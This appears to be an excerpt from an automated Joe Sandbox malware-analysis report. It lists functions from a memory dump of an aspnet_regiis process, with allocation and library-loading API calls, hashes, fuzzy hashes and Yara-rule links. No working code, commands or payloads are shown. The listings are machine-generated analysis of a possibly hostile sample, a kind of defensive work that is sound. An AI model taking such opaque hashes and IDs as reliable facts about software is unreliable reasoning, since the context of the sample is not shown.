                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: moz_xmalloc$malloc
                                                                                                                                                                    • String ID: 0K}l
                                                                                                                                                                    • API String ID: 1967447596-1932881748
                                                                                                                                                                    • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                    • Instruction ID: 21e623df4853cb0d2ece3ce7510466bd75ba9f152c08d2f318b6030035d5c982
                                                                                                                                                                    • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                    • Instruction Fuzzy Hash: 36E026F1B501002A9B0898FC9E0D62A71C9DB146A97044B35E822C2BC9FA15F6828051
                                                                                                                                                                    Function 6C7ABED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C7ABEE3
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C7ABEF5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                    • String ID: cryptbase.dll
                                                                                                                                                                    • API String ID: 4137859361-1262567842
                                                                                                                                                                    • Opcode ID: d3549697aab122897af843e4a76b0ccbb13a10bc40517ef6d84fc0168306c1d4
                                                                                                                                                                    • Instruction ID: 5701d649421dc5523f1e7866da059b3d314ad57fabd5ed07f307c5c9fdc77da6
                                                                                                                                                                    • Opcode Fuzzy Hash: d3549697aab122897af843e4a76b0ccbb13a10bc40517ef6d84fc0168306c1d4
                                                                                                                                                                    • Instruction Fuzzy Hash: B4D0C73118910DEAD7506AD08E06B2537F89741729F50C431F75994E51D7B1A451DFD4
                                                                                                                                                                    Function 6C7EB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C7EB2C9,?,?,?,6C7EB127,?,?,?,?,?,?,?,?,?,6C7EAE52), ref: 6C7EB628
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E90FF
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E9108
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C7EB2C9,?,?,?,6C7EB127,?,?,?,?,?,?,?,?,?,6C7EAE52), ref: 6C7EB67D
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C7EB2C9,?,?,?,6C7EB127,?,?,?,?,?,?,?,?,?,6C7EAE52), ref: 6C7EB708
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C7EB127,?,?,?,?,?,?,?,?), ref: 6C7EB74D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    • Opcode ID: 85cc2fac8653a88f35c25af0dea46d35618715afdad17616c6716b76b48e5449
                                                                                                                                                                    • Instruction ID: 06b176ab248f2de27257ac174a02d7d65cb5bde167af061866928caaf60e2339
                                                                                                                                                                    • Opcode Fuzzy Hash: 85cc2fac8653a88f35c25af0dea46d35618715afdad17616c6716b76b48e5449
                                                                                                                                                                    • Instruction Fuzzy Hash: CC51CFB2A053168FDB14CF29CA8465EBBB1FF49304F45853AC85AABB01D731B804CBA5
                                                                                                                                                                    Function 6C7EDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C7DFF2A), ref: 6C7EDFFD
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E90FF
                                                                                                                                                                      • Part of subcall function 6C7E90E0: free.MOZGLUE(?,00000000,?,?,6C7EDEDB), ref: 6C7E9108
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7DFF2A), ref: 6C7EE04A
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C7DFF2A), ref: 6C7EE0C0
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C7DFF2A), ref: 6C7EE0FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    • Opcode ID: 7ce3d10eb40552e98744ac501dd91c00fd52d006b0c352a05b7542d37ef162a7
                                                                                                                                                                    • Instruction ID: fb81f388440e11d064b6c83c1e60f3e38f39016355f7cbd2648c092b1569b731
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ce3d10eb40552e98744ac501dd91c00fd52d006b0c352a05b7542d37ef162a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0441B4B260421A8FEB24CF68DA8035E77B6BB49308F244D39D556DBB41E731E944CBD2
                                                                                                                                                                    Function 6C7E6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C7E6EAB
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C7E6EFA
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C7E6F1E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7E6F5C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$freememcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4259248891-0
                                                                                                                                                                    • Opcode ID: 9091e74545259323db3e171e461f072c0db0efd4a0e3c36a8ddf3b7c107d9032
                                                                                                                                                                    • Instruction ID: b4de1298b405317f7ed06e7b856cfea8c923b8657c05456c64c3ed34ae4b50c0
                                                                                                                                                                    • Opcode Fuzzy Hash: 9091e74545259323db3e171e461f072c0db0efd4a0e3c36a8ddf3b7c107d9032
                                                                                                                                                                    • Instruction Fuzzy Hash: 2631F872A1060A8FDB14CF2CCE416AA73E9FB88304F50453DD51AC7651EF31E659C790
                                                                                                                                                                    Function 6C7FB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C7A0A4D), ref: 6C7FB5EA
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C7A0A4D), ref: 6C7FB623
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C7A0A4D), ref: 6C7FB66C
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C7A0A4D), ref: 6C7FB67F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1480856625-0
                                                                                                                                                                    • Opcode ID: 377cded6b28bf30d628056c00f74c62193e25535573d55b1d50c4301a3a6a30b
                                                                                                                                                                    • Instruction ID: 2999d3e7f395c84de7e15816ae740069885ae2363873547e5a73795175df2aba
                                                                                                                                                                    • Opcode Fuzzy Hash: 377cded6b28bf30d628056c00f74c62193e25535573d55b1d50c4301a3a6a30b
                                                                                                                                                                    • Instruction Fuzzy Hash: BA31A571A012168FDB10DF68C98465EBBF5EF81318F168579C8169B702DB31F916CBE1
                                                                                                                                                                    Function 6C7CF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C7CF611
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7CF623
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C7CF652
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C7CF668
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                    • Instruction ID: 9c11dcfda8cf107177ef5dff9a497f01d021e19d08495ebc3f736db5415bf72f
                                                                                                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                    • Instruction Fuzzy Hash: DC314F71B00215AFC724CF5DDDC0A9B77B5EB88354B14893DFA498BB05D631F9448BA1
                                                                                                                                                                    Function 6C7E26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                    • Opcode ID: 433cbd4fd75e30d8b1943edf031636dbf15c1970c80025c5a12c93c93c6a5a2c
                                                                                                                                                                    • Instruction ID: e589085c12d294380447e93e2c6c0057b98d112cc2d28e3e3ca83ff2647b567d
                                                                                                                                                                    • Opcode Fuzzy Hash: 433cbd4fd75e30d8b1943edf031636dbf15c1970c80025c5a12c93c93c6a5a2c
                                                                                                                                                                    • Instruction Fuzzy Hash: BEF0F9B37012025BE7109E18ED8894773ADEF4521CB100135EA16D7F02E331F918C691